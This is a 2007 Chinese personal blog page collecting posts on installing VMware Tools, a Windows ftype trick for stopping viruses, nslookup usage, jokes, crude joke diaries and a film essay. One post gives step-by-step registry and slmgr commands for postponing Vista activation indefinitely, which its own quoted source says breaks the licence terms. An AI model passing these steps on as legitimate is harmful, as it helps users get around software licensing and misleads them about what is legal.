博主资料

留言短消息 加为好友 收藏

用户ID:  213
昵称:  银古

标题

曾今拥有的,不要忘记.不能得到的,更要珍惜.属于自己的,不要放弃.已经失去的,留做回忆...

日历

2008 - 7
  12345
6789101112
13141516171819
20212223242526
2728293031  
«» 2008 - 7 «»

日志分类

日志文章列表

2007年09月06日 17:18:25

如何安装vm tools


1、以ROOT身份进入LINUX

  2、按下 CTRL+ALT组合键,进入主操作系统,点击VMWARE状态栏安装提示,或者点击 SETTING菜单下的ENABLE VMWARE TOOLS子菜单。

  3、确认安装VMWARE TOOLS。

  这时我们并没有真正的安装上了VMWARE TOOLS软件包,如果您点击菜单:DEVICES,您就会发现光驱的菜单文字变为:ide1:0-> C:\\Program Files\\VMware\\VMware Workstation\\Programs\\linux.iso,这表示VMWARE将LINUX的ISO映象文件作为了虚拟机的光盘

  4、鼠标点击LINUX界面,进入LINUX。

  5、运行如下命令,注意大小写。

  mount -t iso9660 /dev/cdrom /mnt

  加载CDROM设备,这时如果进入 /mnt 目录下,你将会发现多了一个文件:vmware-linux-tools.tar.gz。这就是WMWARE TOOLS的LINUX软件包,也就是我们刚才使用WINISO打开LINUX.ISO文件所看到的。

  cp /mnt/vmware-linux-tools.tar.gz /tmp

  将该软件包拷贝到LINUX的 TMP目录下。

  umount /dev/cdrom

  卸载CDROM。


  cd /tmp


  进入TMP目录

  tar zxf vmware-linux-tools.tar.gz

  解压缩该软件包,默认解压到vmware-linux-tools目录下(与文件名同名)。

  cd vmware-linux-tools

  进入解压后的目录

  ./install.pl

  运行安装命令。



类别: 无分类 |  评论(1) |  浏览(9200) |  收藏
2007年08月29日 13:21:25

windows系统杀毒新招!

 第一步:在“开始→运行”中输入CMD,打开“命令提示符”窗口。
  第二步:输入ftype exefile=notepad.exe %1,这句话的意思是将所有的EXE文件用“记事本”打开。这样原来的病毒就无法启动了。
  第三步:重启电脑,你会看见打开了许多“记事本”。当然,这其中不仅有病毒文件,还有一些原来的系统文件,比如:输入法程序。
  第四步:右击任何文件,选择“打开方式”,然后点击“浏览”,转到Windows\System32下,选择cmd.exe,这样就可以再次打开“命令提示符”窗口。
  第五步:运行ftype exefile="%1" %*,将所有的EXE文件关联还原。现在运行杀毒软件或直接改回注册表,就可以杀掉病毒了。
  第六步:在每一个“记事本”中,点击菜单中的“文件→另存为”,就可看到了路径以及文件名了。找到病毒文件,手动删除即可,但得小心,必须确定那是病毒才能删除。建议将这些文件改名并记下,重启后,如果没有病毒作怪,也没有系统问题,再进行删除,
  
◆最后介绍一下Ftype的用法
  在Windows中,Ftype命令用来显示及修改不同扩展名文件所关联的打开程序。相当于在注册表编辑器中修改“HKEY_CLASSES_ROOT”项下的部分内容一样。
  Ftype的基本使用格式为:Ftype [文件类型[=[打开方式/程序]]]
  比如:像上例中的ftype exefile=notepad.exe %1,表示将所有文件类型为EXE(exefile表示为EXE类型文件)的文件都通过“记事本”程序打开,后面的%1表示要打开的程序本身(就是双击时的那个程序)。
  ftype exefile="%1" %*则表示所有EXE文件本身直接运行(EXE 可以直接运行,所以用表示程序本身的%1即可),后面的%*则表示程序命令后带的所有参数(这就是为什么EXE文件可以带参数运行的原因)。

Ps:整理自己硬盘发现的一篇文章..也许有的时候对大家有用!
252440568

类别: 无分类 |  评论(0) |  浏览(10313) |  收藏
2007年08月24日 16:56:19

nslookup工具的使用方法

查询IP地址
  nslookup最简单的用法就是查询域名对应的IP地址,包括A记录和CNAME记录,如果查到的是CNAME记录还会返回别名记录的设置情况。其用法是:
  nslookup 域名
  以下是A记录的返回情况。


  nslookup命令会采用先反向解释获得使用的DNS服务器的名称,由于我这里使用的是一个内部的DNS服务器所以没有正确的反向记录,导致结果的前面几行出错。大家可以不必理会。重点看的是最后的两行这里看到的是www.oray.net的IP地址是61.145.112.212。注意即使 www.oray.net的主机没有在线同样能够返回结果。
  如果目标域名是一个别名记录(CNAME),nslookup就开始显示出和ping命令不同的地方了,请看查询CNAME记录的结果。由于CNAME和A记录最后都是活的IP地址,所以一般情况下两者是等同看待的,命令的格式相同。


  注意这次nslookup返回了三行信息,前两行显示这是一个CNAME记录,对应的域名和IP地址。最后显示的就是目标域名, 并注明Alias(别名)。
如果域名不存在会怎样呢?


  看得懂最后以行的英文吗,不懂没关系记住形状就可以了。如果一个指定类型的域名不存在对应的记录同样也是这种结果。
  查询其他类型的域名
  前面两个命令我们没有加任何参数,所以默认情况下nslookup查询的是A类型的记录。如果我们配置了其他类型的记录希望看到解释是否正常。这时候ping就无能为力了。比如我们配置了MX记录,但是邮件服务器只能发信不能收信,到底是域名解释问题还是其他的问题Ping命令的检查只能让你误入歧途。nslookup 这时候可以模拟你的其他遇见服务器进行域名解释的情况。我们需要在nslookup上加上适当的参数。指定查询记录类型的指令格式如下:
  nslookup –qt=类型 目标域名
  注意qt必须小写。
  类型可以是一下字符,不区分大小写:
  A 地址记录(Ipv4)
  AAAA 地址记录(Ipv6)
  AFSDB Andrew文件系统数据库服务器记录(不懂)
  ATMA ATM地址记录(不是自动提款机)
  CNAME 别名记录
  HINFO 硬件配置记录,包括CPU、操作系统信息
  ISDN 域名对应的ISDN号码
  MB 存放指定邮箱的服务器
  MG 邮件组记录
  MINFO 邮件组和邮箱的信息记录
  MR 改名的邮箱记录
  MX 邮件服务器记录
  NS 名字服务器记录
  PTR 反向记录(从IP地址解释域名)
  RP 负责人记录
  RT 路由穿透记录(不懂)
  SRV TCP服务器信息记录(将有大用处)
  TXT 域名对应的文本信息
  X25 域名对应的X.25地址记录
看看oray.net的邮件服务器记录吧。


  看看,nslookup把服务器的名称和地址都给出来了,注意preference就是前面所说的优先级,该数值越小则优先级越高。
  我再看看名字服务器记录是怎么样的。


  看起来和MX记录的格式差不多,一般情况下服务器会同时返回对应的地址。不过也有不返回的情况。
  在这里我希望大家注意一行显示“Non-suthoritativeanswer:”,这一行在前面的例子中都没有显示过。它的出现代表这个结果是从服务器的缓存中得到的。所以提醒你这不是一个授权的答案。前面我们进行的几次查询过程中 192.168.1.104这台机器就采用了我们第一篇文章中描述的过程查询了oray.net的域名。在这个过程中不但缓存了 www.oray.net、test.oray.net以及oray.net的MX记录等最终结果。也包括获取的名字服务器等中间结果。隐含的查询了 oray.net的NS记录。后面我们还会介绍这个过程。
  指定使用的名字服务器
  在默认情况下nslookup使用的是我们在本机TCP/IP配置中的DNS服务器进行查询,但有时候我们需要指定一个特定的服务器进行查询试验。这时候我们不需要更改本机的TCP/IP配置,只要在命令后面加上指定的服务器IP或者域名就可以了。这个参数在我们对一台指定服务器排错是非常必要的,另外我们可以通过指定服务器直接查询授权服务器的结果避免其他服务器缓存的结果。命令格式如下:
  nslookup [-qt=类型] 目标域名 指定的DNS服务器IP或域名
  我们可看看以下的命令结果:



 域名解释过程的模拟
  我们现在来模拟一下一台DNS服务器接到一个不是自己管理的域的域名解释过程。回忆一下第一篇文章的过程:
  首先我们会询问根服务器,然后根服务器会让我们去找对应的顶级服务器。如果查询的是oray.net,就会要求我们去找net的服务器。
  看看下面的范例:
  这里我们让21cn.com的服务器解释www.oicp.net的域名,很显然这台服务器不用有这个域,需要询问根服务器。一般情况下DNS服务器会帮我们完成全部的过程。这种解释方式我们称之为递归解析,为了让大家看到这个过程我家了一个参数让 21cn.com的服务器不要这样做。这个参数是-norecurse。这样理论上21cn.com会让我们去问根服务器,不过由于它已经缓存了顶级服务器的记录,所以直接返回了管理net的顶级服务器记录。实际上大部分的查询都不需要从根服务器开始。大家看到了所有的顶级域名服务器的地址都被返回。
  我们随便选择一个在进行查询。


  这次顶级服务器就返回了oicp.net的服务器地址记录的。然后我们就向这些记录之一进行查询,一定能够得到答案。可能是一个地址、一个CNAME记录或者告诉你不存在。
  nslookup的命令就介绍到这里,其实nslookup还有许多其他参数。不过常用的就俄这么几个,另外如果大家不喜欢命令行方式的话。还有几个图形界面的nslookup功能的工具。不过大家还是需要了解域名解释都有些什么才能够正确使用这些工具。

类别: 无分类 |  评论(0) |  浏览(10152) |  收藏
2007年08月02日 18:40:06

让人暴笑的语录

  科学家会武术,神仙都挡不住。
  谁要不认识他,谁就没吃过猪肉。
  正说着呢,布什身上BP机响,英显的。
  走自己的路,想说谁说谁去吧。
  他们家有门风么,走道不拣东西就算丢。
  你无耻的样子,颇有我年轻时候的神韵。
  您体格好啊,一看就知道一准儿活到死。
  这小伙子长得,把脸挡上跟个演员似的……
  我和超人唯一的区别就是我把内裤穿里边了。
  好些天都没吃饭了,看谁都像烙饼。
  连炸酱面都不爱吃?你忘本啊!!!
  “爸爸,我饿!” “又喊饿,你去年没吃饭吗?”
  散场大家都别走啊,我请大家吃饭——谁去谁掏钱。
  想吃汉堡,包张纸揭开吃;想吃螃蟹,揭个盖;想喝奶,馒头上弄一揪儿……
  我到饭店吃饭,您这有鸡吗?服务员:嘘,我就是!
  有二尺长的龙虾吗?对不起没有二尺长的只有二尺二的,什么破饭店连二尺长的龙虾都没有,来盘土豆丝。
  我要了份鱼翅炒饭,用三双筷子楞没找着鱼翅,你能告诉我鱼翅在哪吗?厨师说,我叫鱼翅。
  给来四十个馒头,八十斤烙饼,这菜谱给炒两本——自杀的方式很多,这样太糟践粮食了。
  我的饭量你是知道的,尤其也不喜欢烤鸭,才吃了四只就吃不下去了,烙那饼,一张饼卷一只……实在不能吃了,待会儿回家还要吃饭呢。
  桌上摆着四盘菜,打开第一个看,呵!真好!老醋花生!打开第二个,更好了!老醋花生!第三个打开,花生,没醋!第四个一看,一盘醋!
  这脑仁就松籽儿大的个儿,打开脑壳一看,就一碗卤煮。
  呵!他跟我犟嘴!你以为我不敢炖你,我家要有锅我早把你炖了。
  今儿好日子啊,立秋,贴秋膘儿的日子,今天中午特意吃了四两素炒饼,相信大伙儿也都贴了秋膘儿了。
  来到天堂,这儿建筑好看,两边还有牌子:天堂左右一百米严禁摆摊!
  今天说的这故事,离现在不远,家里有老人的可以回去问问,在春秋战国时期啊 ……
  有一前辈,很成功,抢劫183万现金,下午5:40,警察到的时候,还跟北三环堵着呢。
  那锁拿根面条一捅就开,一包方便面能开一小区。
  没有拦得住他的门,没有挡得住他的锁,就是银行的保险锁他弄根芹菜就能把它捅开了。
  我们半路迷路了,他拿出一堆仪器来,指东南西北针……我说你这都落后了,咱得采取先进的办法,扔鞋吧。
  我小学十年,中学十二年,我被评为全校最熟悉的面孔,新老师来了都跟我打听学校内幕……
  老爷子身体不错,就是满嘴牙都掉了,就剩下一颗牙,吃东西还塞牙了……吃藕套眼儿里头

田二飞起来,大头朝下奔着马路牙子就去了,拿脑袋跟这石头做了一个轻微的较量……田二输了。
  跳楼死多可乐,我研究过,二十层和二层效果不一样,二层是啪、啊!二十层是啊~~~~~啪!高科技啊!
  你们千万别打他,也别骂他,不就是要钱么,咱好商量。不过丑话说头里,要是超过100块钱,你们就撕票得了。
  守法朝朝忧闷,强梁夜夜欢歌。损人利己骑马骡,正直公平挨饿。修桥补路瞎眼,杀人放火儿多。我到西天问我佛,佛说——我也没辙。
  接了一活儿,完事能挣三十万……拿过图纸一看,盖一40米的烟囱,都盖好了,人家本家来一看,把我打了一通,图纸看倒了,人家让挖口井。
  阴曹宝殿底下支着油锅,小鬼们拿着钢叉,把刚死的人叉挑油锅,有一个人下去的,有俩人一块儿下去炸的,还有抻成四方的炸的……(油饼油条啊?)
  人家有等离子电视,我也弄一个,找朋友攒的。一面墙那么大,摩托罗拉牌儿的……看着看着没人儿了,电视出声音:您所收看的电视不在服务区……哪说理去,这300块钱不白花了么。
  人家给我介绍个女朋友,这漂亮啊,脸长得像车祸现场似的。
  我买50辆好车--奥拓、奥拓、奥拓……!用铁丝镖起来,开起来跟火车一样!
  他太有钱了,开一13开门的卡迪拉克。一听声音就知道是好机器,德国进口的,“突突突突”,前排就驾驶员一人,方向盘都跟别人不一样,平常都是圆的,他那是纯银打造,长的,两头弯下来。哦,三蹦子。一开起来,半个北京城冒黑烟,交警直冲您喊:“孙长老,收了神通吧。”
  打车……咱不打一块六的,咱打一块二的! 我才不坐前面呢,坐前面得结帐!!
  敢情你入了丐帮了!打扮得很讲究啊!
  一块钱六个手榴弹,我先扔你一百块钱的!
  我扔铅球扔得可远了,教练说了,人出去了不算啊!
  我当艺术家都一个多礼拜了。
  花二百钱买一小猪儿,吱吱喝水,嘎巴嘎巴吃豆,解墙头扔过去,吱的一声,你猜怎么着~~~死了!
  住的房子千疮百孔,一下雨算要了亲命了:外边小雨屋里中雨,外边大雨屋里暴雨,有时候雨实在太大了,全家人都上街上避雨去了.

“有一个好消息,有一个坏消息,你听哪个?”“坏消息是什么”“咱们迷路了,这地儿我不认识,而且我估计我们以后得靠吃牛粪过日子了”“好消息呢?”“牛粪有的是!”

类别: 无分类 |  评论(0) |  浏览(10381) |  收藏
2007年07月22日 13:33:18

日记

  7月7日
    我知道我不算帅哥,但曾经有人看我满月的照片时,也说过我左边的鼻孔很偶像派。
  
  8月30日
    独守空房,让人只能浪费;妻妾成群,让人懂得节俭。可是我现在,却在终日浪费中向往节俭。
  
  5月10日
    我想我是个变态,我有恋母和喜欢极品熟女的癖好。不然为什么每次看到我们超市主管的那张脸,我都想操她奶奶?
  
  3月18日
    和女朋友分手之后,我终于明白,幸福要掌握在自己的手中,而不是在别人的嘴里!
  
  7月9日
    今天看书,看到康熙皇帝在二十三岁的时候已经贵为一国之君,绩伟功丰,我很沮丧;但又看到同治皇帝在二十三岁时已经死了四年了,我平饬恕?
  
  11月11日
    情人节,孤单的我在饭馆吃面,听到收音机里的点歌节目说:“有一位先生给所有恋人们点歌来表达他的祝福,下面请听《无言的结局》。”……我觉得很不好,人可以无爱,但不能无耻,于是我也打电话点播了一首歌——梁静茹的《分手快乐》。
  
  7月20日
    以前喜欢过一个女孩,表白了,那女孩问我为什么喜欢她,我说:如果你是我,也会喜欢上你自己的;
  
    后来,她把我拒绝了,我很伤心,她不了解我,我告诉她:如果我是你,肯定早就喜欢上我自己了!
  
  12月9日
    今天饭馆的白酒又兑水了!**!等我有钱了,也到大酒楼去喝人头马、XO什么的!而且绝对不让他们用八六年和七二年的糊弄我,要喝就来瓶今年的!
  
  9月12日
    其实馒头是万能的,饿了就可以吃。想吃饼,就把馒头拍扁;想吃面条,就把馒头用梳子梳;想吃汉堡,就把馒头切开夹菜吃……
  
  9月12日
    男人,上半身是修养,下半身是本质;女人,上半身是诱饵,下半身是陷阱。
  
  9月10日
    单身很痛苦,单身久了更痛苦,前几天我看见一头母猪,都觉得它眉清目秀的……
  
  6月22日
    男人分两种,一种是好色,一种是十分好色;
  
    女人也分两种,一种是假装清纯,一种是假装不清纯。
  
  1月19日
    有些人的爱情是A片,有些是三级片,有些是喜剧片,有些是文艺片;
  
    我最惨,我的爱情过程是文艺片、喜剧片、三级片、A片、悬疑片、动作片,最后是KB片,更可气的是,还他 妈插播广告……
  
  2月13日
    明天情人节,我辗转找到一个我中学暗恋的女生的电话,给她发了一条短信:如果只有一碗粥,你先喝半碗,剩下的半碗,我放在怀里给你保温……
  
    几分钟后,她回了一条短信:你是谁介绍的?一次四百,包夜七百。
  
  2月14日
    舍不得孩子套不着狼,舍不得媳妇抓不着流氓,舍不得更新得不着收藏……
  
    今天心情一直不好,昨晚的短信让我知道了,我以前暗恋的女生堕落了,竟然跟我说一次四百……
  
    当时我很伤心,一边伤心一边翻了翻钱包:
  
    于是我更伤心了,我连陪她堕落一次的资本都没有……
  
  4月15日
    你问我,幸福在哪里?我告诉你,你踮起脚尖,就能离幸福更近一些,你闭上眼,就能感受到幸福了……
  
    许久,我们分开,我看着你羞红的脸颊,轻声问你,感觉到幸福了么?
  
    你温柔的低头,娇声回了一句:你今天,吃蒜了。
  
  5月10日
  
    什么叫残忍?
    是男人,我就打断他三条腿;是公狗,我就打断它五条腿!
  
  
  6月9日
    今天心情不好。我只有四句话想说。包括这句和前面的两句。我的话说完了……
  
  
  7月23日
  
    对付凶恶的人,就要比他更凶恶;对付卑鄙的人,就要比他更卑鄙;
  
    对付潇洒的人,就要比他更潇洒;对付英俊的人,就要……毁他的容!
  
  7月23日
  
    上一次恋爱给我的教训是:不要找一个喜欢吃辣的女孩作女朋友。
  
    每一次请她吃完麻辣火锅,我们在一起亲热时,我都会在痛苦不堪中想起一首歌:《燃烧吧!火鸟》。
  
  5月23日
    我的原则是:人不犯我,我不犯人;人若犯我,我就生气!
  
  5月23日
    忽然想起上大学时,老师出对联:国兴旺,家兴旺,国家兴旺。
  
    班长对下联:天恢弘,地恢弘,天地恢弘!
  
    后来我被赶出了教室……
  
    因为我对的下联是:你 妈 的,他 妈 的,你 他 **!
  
  5月23日
    偶然看见书上所谓的当代女子择偶标准:有车有房,父母双亡。
  
    郁闷。遂写下幻想中的选妻标准:
  
    家中财产过亿,美貌天下第一,贤惠温柔性感,岳父癌症晚期……
  
  7月17日
    凤凰重生就是涅盘,野鸡重生就是尸变。
  
  7月11日
    人生啊,不能在一棵树上吊死,要在附近几棵树上多死几次试试。
  
  8月18日
    我才发现,吸引住男人的办法就是让他一直得不到;吸引女人的办法正好相反,就是让她一直满足。
  
  9月8日
    人生的悲惨在于:辛辛苦苦的作了一晚上内容香艳的美梦,第二天早上醒来居然全都记不起来了!
  
  5月19日
    这个世界不公平就在于:
    上帝说:我要光!——于是有了白天。
  
    美女说:我要钻戒!——于是她有了钻戒。
  
    富豪说:我要女人!——于是他有了女人。
  
    我说:我要洗澡!——居然停水了!
  
  5月8日
    吃了晚饭在阳台抽烟享受,忽见夜空中一个光点转瞬即逝的划过,心里一激动:流星!于是马上许愿……
    许了六七个愿望,睁眼,烟已经抽完了,顺手扔出阳台,忽然听见楼下一个女孩的声音:“哇!流星!快许愿……”
  
  3月22日
    记得刚毕业不久的一天,女友给我发了一条短信:“我们还是分手吧!”
  
    我还没来得及伤心呢,女友又发来一条:“对不起,发错了。”
  
    这下可以彻底伤心了……
  
  8月15日
    野猫:走哪儿睡哪儿。
  
    野狗:逮什么吃什么。
  
    野男人:见一个爱一个。
  
  3月17日
    在街上看美女,目光高一点就是欣赏,目光低一点就是流氓。
  
  
  9月6日
      父亲问我人生有什么追求?
  
    我回答金钱和美女,父亲凶狠的打了我的脸;
  
    我回答事业与爱情,父亲赞赏的摸了我的头。
  
  5月17日
    科学证实:劣质避孕套容易导致直肠癌。
  
  5月17日
    香荷碧水动风凉,水动风凉夏日长,长日夏凉风动水,凉风动水碧荷香。
  
  10月31日
    有人说春天把女朋友埋到地下,到了秋天就会收获很多很多女朋友。
  
    我朋友相信并照做了,他在春天把女朋友埋到了地下,到了秋天,他被警 察叔叔埋到了地下……
  
  2月27日
    面对困难时:死都不怕,还怕活着吗?
  
    面对危险时:活着都不怕,还怕死吗?
  
    这就是爱因斯坦的相对论……
  
  2月27日
    女孩在乎的是下半生的幸福;男孩关注的是下半身的幸福……
  
  2月27日
    如果人生能像电影一样,我一定大刀阔斧的剪辑一遍,把少年时上学的段落剪成字幕,把青年时创业的段落剪成一个特写,把中老年时期的成功片段,剪成整个故事……
  
  10月28日
    今天约见了一女网友,名叫“稚嫩小妹”,暗号是拿着一只玫瑰花,在约会地点张望,见一女握玫瑰做翘首状,遂逃,晚上联网,质问对方:怎么是你妈来替你见网友?……从此我安静的躺在了她的黑名单里。
  
  10月28日
    真不明白,女孩买很多很多漂亮衣服穿,就是为了吸引男孩的目光,但男孩想看的,却是不穿衣服的女孩。
  
  12月31日
    一般来说长命百岁只是祝愿,但人想活一百岁其实很简单,就是你必须咬牙坚持忍受一千二百个月……
  
  5月17日
    每个人都是天上落下的天使,只不过有的是完好无损的着陆,有的是脸先着地,有的更倒霉,下落的时候直接骑在了围墙栏杆上……
  
  2月10日
    我终于活着回来了!
  
    刚刚见了一个网友,长得很像如花,还是毁容版的如花,你能想像么……
  
  2月10日
    我喜欢把人生交给命运:早上醒来我都会抛硬币,如果正面朝上,我就继续睡觉;如果背面朝上,我就躺在床上看电视。如果硬币落地后是立起来的,我就起来收拾屋子。
  
  2月22日
    维持生命在于运动,创造生命也在于运动,区别就是——床下床上。
  
  2月10日
    我慢慢发现,人才是妖精!有些妖精吃人,但人什么都吃,逮着一只妖精没准也能烧烤了!
  
  6月12日
    凶残的人——没事找个人来杀杀。
  
    风流的人——没事找个美女睡睡。
  
    富有的人——没事买辆新车开开。
  
     我——没事捡个烟头抽抽……
  
  6月12日
    年少的时候有一段时间,一直想表现自己彪悍的一面,于是想纹身,最终没有实施的原因是:我一直在犹豫是纹蜡笔小新好,还是纹铁臂阿童木好。
  
  3月11日
    男人都好色,色心稍强一点叫色狼,再强一点叫色鬼,更加强就叫色魔,尤其强那就成了变 态色魔,好色到了极致,被称作人体美学艺术家。
  
  3月11日
    下雨天别出门,雨水虽没毒,湿身事小,淋病事大啊。
  
  3月11日
    我把她从女孩变成了女人;她把我从男孩变成了....................穷人。
  
  3月11日
    如果幸福是浮云,如果痛苦似星辰。
  
    那我的生活真是万里无云,漫天繁星……
  
  3月11日
    男人所说的内在美,指的是胸罩里面,而不是内心。
  
  3月11日
    我退化了,到现在我还不会游泳,要知道在我出生之前,我绝对是游的最快的那个……
  
  7月21日
    人要学会自己寻找一些小幸福,比如到街上看一看那些不属于自己的美女,去银行看一看那些不属于自己的钞票,到车展上看一看那些不属于自己的跑车,然后在街上找一个乞丐看,告诉自己:没关系,刚才的那些也不属于他……
  
  7月21日
    这几天一直下雨,我猜是玉皇大帝在哭,一定是他和王母娘娘的婚姻不幸福,这种不幸福有两种可能,一种是王母娘娘离开了,一种是王母娘娘不肯离开……
  
  9月23日
    妹妹问我:“哥,接吻是什么样的?”我笑着告诉她:“傻丫头,接吻时要说:猪~~~”
  
    弟弟问我:“哥,什么是接吻啊?”我说:“接吻?张嘴,伸舌头。”
  
  9月23日
    经血是子宫在为孤独哭泣,梦遗是精囊在为压抑流泪。月经一月一次,梦遗却不定期,这正说明:男儿有泪不轻弹……
  
  
  2月18日
    今晚仰卧,明早起坐,明晚俯卧,后天撑~~~锻炼,有时候就是这么简单。
  
  6月20日
    小时候经常听说有人因为生活压力大而自杀,那时我懂得死亡,却不明白压力是什么,现在长大了,我懂得了什么是压力,开始不明白为什么还有那么多人活着……
  
  6月20日
    老天爷给我一双眼睛,让我看到花花世界;老天爷又给我一双手,让我去勤奋劳动挣钱;老天爷再给我一张嘴,让我用它来咒骂老天爷的不公平……

类别: 无分类 |  评论(0) |  浏览(11180) |  收藏
2007年05月23日 09:46:28

合法使用Vista1年!!免激活!!


  Vista免费!合法!不用激活!至少使用一年!
  多么激动人心的字眼!(bbs.52hardware.com)团队第一时间拿到了国外的牛人大作,简单之极,只需更改注册表和执行两个命令行程序!

  步骤1: 运行一个尚未激活的Windows Vista系统。点击左下角的“开始”,点击“运行”,输入 regedit 回车确认,打开Vista系统自带的注册表编辑软件。
  步骤2:找到下面的这个地方:HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SL

  步骤3:右点击注册键名字为“skiprearm”的项目,点击编辑。 该兼职默认是dword(双字或4字节),16进制的值为00000000,改变这个数值为任何正整数,例如00000001,保存设置,然后,关闭退出regedit这个注册表编辑软件。

  步骤4:用管理员身份启动命令行程序,最快的办法是点击启动按钮,在搜索框输入cmd,然后再按Ctrl+Shift+Enter即可。如果你被要求输入用户帐号和密码,那么你就输入管理员帐号和密码即可用管理员身份执行命令行程序了。

  步骤5:在命令行里面输入
  slmgr -rearm
  或者输入
  rundll32 slc.dll,SLReArmWindows
  输入上面任何一个命令,都将使用到Vista系统内置的软件授权系统,就是Software Licensing Manager (SLMGR) ,会把激活日期的最晚期限推迟30天。把 SkipRearm这个值从 0 改到 1 将允许SLMGR系统无限期使用激活多次。要么就把SkipRearm的变回0。

  步骤6:重启电脑使设置生效,登陆进入系统后,如果你喜欢,你可以使用 slmgr -xpr 这个命令行程序,来看Vista最新的免费使用到期日期!

  步骤7:如果想得延长更多免费使用期限,重复步骤1至6即可。

How to run Vista legally without activation … for at least a year
Microsoft has built into Vista a function that allows anyone to extend the operating system’s activation deadline not just three times, but many times. The same one-line command that postpones Vista’s activation deadline to 120 days can be used an indefinite number of times by first changing a Registry key from 0 to 1.
This isn’t a hacker exploit. It doesn’t require any tools or utilities whatsoever. Microsoft even documented the Registry key, although obtusely, on its Technet Site.
But dishonest PC sellers could use the procedure to install thousands of copies of Vista and sell them to unsuspecting consumers or businesses as legitimately activated copies. This would certainly violate the Vista EULA, but consumers might not realize this until the PCs they bought started demanding activation — and failing — months or years later.
The following describes the Registry key that’s involved.
Step 1. While running a copy of Windows Vista that hasn’t yet been activated, click the Start button, type regedit into the Search box, then press Enter to launch the Registry Editor.
Step 2. Explore down to the following Registry key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SL
Step 3. Right-click the Registry key named SkipRearm and click Edit. The default is a Dword (a double word or 4 bytes) with a hex value of 00000000. Change this value to any positive integer, such as 00000001, save the change, and close the Registry Editor.
Step 4. Start a command prompt with administrative rights. The fastest way to do this is to click the Start button, enter cmd in the Search box, then press Ctrl+Shift+Enter. If you’re asked for a network username and password, provide the ones that log you into your domain. You may be asked to approve a User Account Control prompt and to provide an administrator password.
Step 5. Type one of the following two commands and press Enter:
slmgr -rearm
or
rundll32 slc.dll,SLReArmWindows
Either command uses Vista’s built-in Software Licensing Manager (SLMGR) to push the activation deadline out to 30 days after the command is run. Changing SkipRearm from 0 to 1 allows SLMGR to do this an indefinite number of times. Running either command initializes the value of SkipRearm back to 0.
Step 6. Reboot the PC to make the postponement take effect. (After you log in, if you like, you can open a command prompt and run the command slmgr -xpr to see Vista’s new expiration date and time.
Step 7. To extend the activation deadline of Vista indefinitely, repeat steps 1 through 6 as necessary

类别: 无分类 |  评论(0) |  浏览(20501) |  收藏
2007年04月08日 11:54:58

十年前我绝对不懂的《大话西游》



这个世界上还有一个故事,叫做《大话西游》。
    
世界是巨大的枷锁,你不得不重复自己或是别人的生活。
记得长辈说过:年轻是一种罪过。他们说我们不成熟。
    
真切地为自己的不俗喝彩,在深切的郁闷中,突然就看懂了《大话西游》的开头: 一位才华横溢又无法无天的青年(孙悟空),根本不喜欢世人摊派给他的大事业(西天取经)。他尤其受不了师父(唐僧)的唠唠叨叨,可世俗条规(观音)又不放过他。为让他悔悟,心甘情愿地去取经,唐僧和观音达成妥协:让他五百年后重新做人。 这真是一个宿命的开始。
    
九七一师兄曰:“大学的孩子都是玻璃罐里养蛤蟆,前途光明出路不大。”再贴切不过。大闹天宫无非是大学四年的黄金时光罢了,找到工作走上社会任你盖世的才华浑身的个性也自有翻不出的五指山来压。只有戴上紧箍咒取经去,九九八十一难,做一个奇奇怪怪的佛。你别无选择。
    
五百年后的悟空叫至尊宝,在五岳山从事一份很有前途的职业—— 山贼。命运却要他扮演孙悟空,至尊宝只是个过渡罢了。蜘蛛精来了,白骨精来了,菩提老祖来了,牛魔王也来了……都是棋子,安静地立在命棋盘的中央。
他的路线是早定好的:(1)一个人给他三颗痣(2)戴上紧箍咒(3)打败牛魔王(4)西天取经。可怜的至尊宝什么都不知道,认认真真做山贼,还爱上了白骨精,想和她结为百年之好。
    
所有的事都瞒着他接二连三地发生。
    
给至尊宝三颗痣的人是紫霞仙子。谁说的:总有一个女孩出现,让男孩最终成为男人。而男人永远都不可能得到她,那简直是一定的。
    
非常喜欢紫霞的开场白:“现在我郑重宣布,这座山上所有的东西都是我的,包括你。”那样的气贯云霄,像一个童话故事。
而现实是:这个世界没有什么属于你,包括你自己。也许我们就是为了创造属于自己的东西才来到这个世上,因为年轻,所以押注于爱情。
至尊宝拒绝了紫霞,他以为自己还爱晶晶。见到晶晶,他又发现紫霞才是真爱。命运一直在同他开玩笑:至尊宝忽然成了孙悟空,千辛万苦找晶晶又爱上了紫霞。而抉择是那样残酷:要打败牛魔王救紫霞,就必须戴上紧箍咒做回神通广大的孙悟空;而戴上紧箍咒就不能有半点情欲,只有取经去。
为至尊宝不平:不明白在这样的故事里为何爱情总要成为牺牲品,干嘛不让周星弛携紫霞纤纤小手——走先!我曾无数次在网上反映过类似意见,搞得很累。爱情是那样美丽而脆弱,无法直面生活的琐碎和坚韧。哪段感情又没有绚烂的瞬间和艰难的长久,在一起就会幸福吗,未必。
    
至尊宝挖开自己的心,看到了紫霞留在那里的一滴眼泪,毕竟曾经沧海过。 五百年又五百年,兜了一个大圈子又回到了原地。人没能战胜命运,而人的尊严却在抗争中得到了肯定,人的情感也必将不朽。“生亦何欢,死亦何苦。”大彻大悟。
    
紧箍咒,圈住昔日的梦想,圈住棱角分明的个性。
    
成熟是一个很痛的词,它不一定会得到,却一定会失去。
    
永别了,激情四溢的花样年华!永别了,神采飞扬的青春岁月!永别了,同学!永别了,爱人同志!至此后漫漫长路我独行。
    
望着荧幕上扛着金箍棒的悟空,忽地明白了本班男生什么自称光棍。向光棍行者们敬礼!
    
全片最后一句台词是:“你看那个人,好奇怪哟,象一条狗。”
罗曼蒂克、海誓山盟、生死相许……面对爱情这些都是琐碎,不值一提。
爱情就是爱情,不是别的什么东西。
能与爱情同在的只有生命,其他都滚一边儿去。
你爱了,难道还不够吗?
悟空爱了,不论晶晶还是紫霞,他都要将爱情进行到底。
晶晶爱了,那个弃她而去的悟空,“不能和喜欢的人在一起,做人又怎会开心。”
紫霞爱了,“谁拔出我的紫青宝剑,谁就是我的如意郎君。”
爱一个人需要理由吗?
孙悟空会爱白骨精,八戒爱上了蜘蛛精。紫霞爱他至深,因为他拔出了一把剑。
    
故事里的人找爱人的理由永远千奇百怪:王子要用水晶鞋才能找到灰姑娘,薛宝钗要那有玉的人来配……可生活永远现实得多,芸芸众生,谁又能许谁一个未来,自欺欺人罢了。
    
有理由也好,没理由也罢,可还是要爱。让我去,过程就是结果,无悔。
    
